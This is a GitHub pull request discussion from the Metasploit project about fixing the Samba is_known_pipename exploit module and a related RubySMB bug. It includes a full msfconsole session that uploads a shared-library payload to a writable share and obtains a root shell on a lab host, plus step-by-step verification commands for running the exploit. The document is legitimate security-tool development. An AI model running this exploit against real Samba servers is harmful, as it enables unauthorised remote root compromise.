-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Fix is_known_pipename module #14035
Fix is_known_pipename module #14035
Conversation
I'm going to mark this |
That's correct! Thanks for the review! I'll let you know when the new |
@smcintyre-r7 , a new |
Well I tested this and I couldn't get the module to work without commenting out these lines in RubySMB. With the RubySMB exception
Without the RubySMB exception
I think the root cause is this check in |
Thanks for testing this @smcintyre-r7 ! I tracked down the issue and it is related to a bug in SMB1 Trans2 response packet structures. This has been fixed in rapid7/ruby_smb#165. RubySMB tries to parse the response packet as an I'm going to mark this PR as delayed again until rapid7/ruby_smb#165 has been landed. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
With the latest RubySMB (2.0.6) changes this is now working as intended:
msf6 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic (Interact)
msf6 exploit(linux/samba/is_known_pipename) > set RHOSTS 192.168.159.51
RHOSTS => 192.168.159.51
msf6 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER test
SMB_FOLDER => test
msf6 exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME NetApps
SMB_SHARE_NAME => NetApps
msf6 exploit(linux/samba/is_known_pipename) > exploit
[*] 192.168.159.51:445 - Using location \\192.168.159.51\NetApps\test for the path
[*] 192.168.159.51:445 - Retrieving the remote path of the share 'NetApps'
[*] 192.168.159.51:445 - Share 'NetApps' has server-side path '/data/network-applications
[*] 192.168.159.51:445 - Uploaded payload to \\192.168.159.51\NetApps\test\uXMZXHua.so
[*] 192.168.159.51:445 - Loading the payload from server-side path /data/network-applications/test/uXMZXHua.so using \\PIPE\/data/network-applications/test/uXMZXHua.so...
[+] 192.168.159.51:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.159.51:445) at 2020-09-23 17:44:03 -0400
id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 1? [y/N] y
[*] 192.168.159.51 - Command shell session 1 closed. Reason: User exit
msf6 exploit(linux/samba/is_known_pipename) >
I've removed the delayed tag, then I'll bump the RubySMB version in the Gemfile as I land this. Thanks @cdelafuente-r7 !
Release NotesFixed an issue in the |
This fixes part of #13976.
This requires these fixes in RubySMB library, which are not merged yet: rapid7/ruby_smb#163To test this PR, RubySMB will need to be used from source until this PR is merged and a new gem is released:- Do:git clone https://github.com/cdelafuente-r7/ruby_smb
- Do:cd path/to/ruby_smb
- Do:git checkout fix_for_old_samba_compatibility
- Add this to your Gemfile:gem 'ruby_smb', :path => 'path/to/ruby_smb'
- Do:bundle install
UPDATE: The PR has been merged and a new
ruby_gem
has been released. I updated the Gemfile.lock to reflect this.This as been tested against Samba 3.5.4, 3.6.6 and 4.1.11.
Verification
msfconsole
use linux/samba/is_known_pipename
set RHOSTS <host>
set SMBUSER <username>
set SMBPASS <password>
exploit